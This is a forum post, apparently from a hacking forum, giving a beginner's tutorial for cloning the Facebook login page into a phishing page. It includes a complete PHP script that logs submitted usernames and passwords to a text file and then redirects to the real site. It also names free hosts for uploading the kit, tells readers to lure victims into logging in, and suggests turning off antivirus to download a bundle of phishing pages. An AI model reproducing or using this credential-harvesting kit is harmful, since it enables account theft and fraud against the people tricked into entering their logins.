Phishing Full Tutorial

dunkelh3it

BANNED
Messages
547
Reputation
37
Reaction score
1,108
Points
93
Telegram
@Dunkelh3it
Please note, if you want to make a deal with this user, that it is blocked.
How To Make A Phishing Page Of Any Websites | Full Tutorial

Hi readers,
From now onward we’ll learn serious hacking and today I’m going to discuss about a well known hacking method that’s called phishing.Most of internet users aware of that but I told you guys this site is for newbies and that’s why I’m trying to teach you guys from the beginning .In this tutorial you guys will come to know details about phishing , how it works , how to make a phishing page and total 34 phishing page completely free !

Well, let’s get started

What is phishing?
Phishing is typically carried out by e-mail or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to fool users,and exploits the poor usability of current web security technologies. In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication.

How to make any kind of phishing page ?

Many of you may use software to make a phishing page but today I’ll show you guys something behind software and how you can make a phishing page by yourself .

Well, to make any complete phishing package we need to make the following things :

Phishing pagePHP scriptLog in file
Make A Phishing Page:

Step 1:


Go to the website that you want to make a phishing page .

Hence I’ll show you how to make a phishing page of facebook ;)

So, go to the official website of facebook www.facebook.com .

Step 2:

Now, click on the right button of your mouse and click view page source . You’ll be able to see a page like the picture below .

Step 3:
Copy the whole page and paste it into Notepad.

(To open the Notepad go to Start >All programs >Accessories >Notepad )

Step 4:
Now Press ” Ctrl+F ” and and click Find Next to search for “action” word .You’ll find total 3 “action” but choose the one that is after the “login_form” word.See the picture below to understand it properly.

That's the original source code of facebook login page and when we login our action is sent to the url written next to the highlighted portion.

Step 5 :
Now replace the Url after action word (https://www.facebook.com/login.php?login_attempt=1) with your exploit. I have given this exploit with the name of funsofts.php in the download package.[On my next post I'll provide download package] So, it will become as below :

Step 6 :
Now save as
1. Give the File name - index.html
2. Select Save as type - All Files
3. Select Encoding - Unicode
4. Click Save button to save the file.
See the picture below to get it properly.

You already made a fake log in (phishing page) page Now, you have to make a PHP scrips .Follow step by step and you’ll be done

Make A PHP Scripts:

Step 1:
Open your Notepad

Step 2:
Copy and paste the code given below.

Code:
<?php
header (‘Location: http://www.facebook.com/’);
$handle = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

Note: At the second line of code you see header (‘Location:http://www.facebook.com/’) .Here, we are making a facebook phishing page that’s why I provide the official URL of facebook but if you wanna make phishing page for some other page then you should give the official URL of that website.

Ex: If you want to make a phishing page of yahoo mail then it would be like this
header (‘Location:https://login.yahoo.com/’)

Hope, I made you clear :p

Step 3 :Now Save as
1. Give the File name - funsofts.php
2. Select Save as type - All Files
3. Select Encoding - Unicode
4. Click Save button to save the file.

Make A Text File:

1. Just right click on your mouse and go to New>Text document .You will see a new text file will be appear .Give it a name like log.

Well done You successfully made the phishing package .Now whatever you have to do just upload the all three file [Phishing page, PHP scripts, Text (log) file ] to any website that support PHP and send the link to your victim and convince him/her to log in your fake log in page. When your victim will log in to your fake log in page you’ll get the password and email address at your log.txt file.

Here are some websites name there you can upload your phishing page:

1.<<www.my3gbcom>>

2.<<www.box.net>>

May be you know this trick before but always remember one thing.

“A old trick is may be a new trick for someone who didn’t know that before”

That’s why it was essential to provide the whole tutorial for newbies Now you’ll be able to hack any Facebook account, Yahoo mail, Gmail, Twitter account or anything you want by phishing method.

Here are 37 phishing pages for 37 websites .You can download this package if you want .May be your antivirus will detect it as a virus cause many anti-viruses detect phishing page as a virus.You may can turn off your anti-virus before download it or if you don’t trust me than I recommend you to don’t download this package.
 
Last edited by a moderator:

dunkelh3it

BANNED
Messages
547
Reputation
37
Reaction score
1,108
Points
93
Telegram
@Dunkelh3it
Please note, if you want to make a deal with this user, that it is blocked.

kinx

BANNED
Messages
18
Reputation
0
Reaction score
4
Points
3
Please note, if you want to make a deal with this user, that it is blocked.
Wow that’s lovely. Please were is the download link ?
 
Top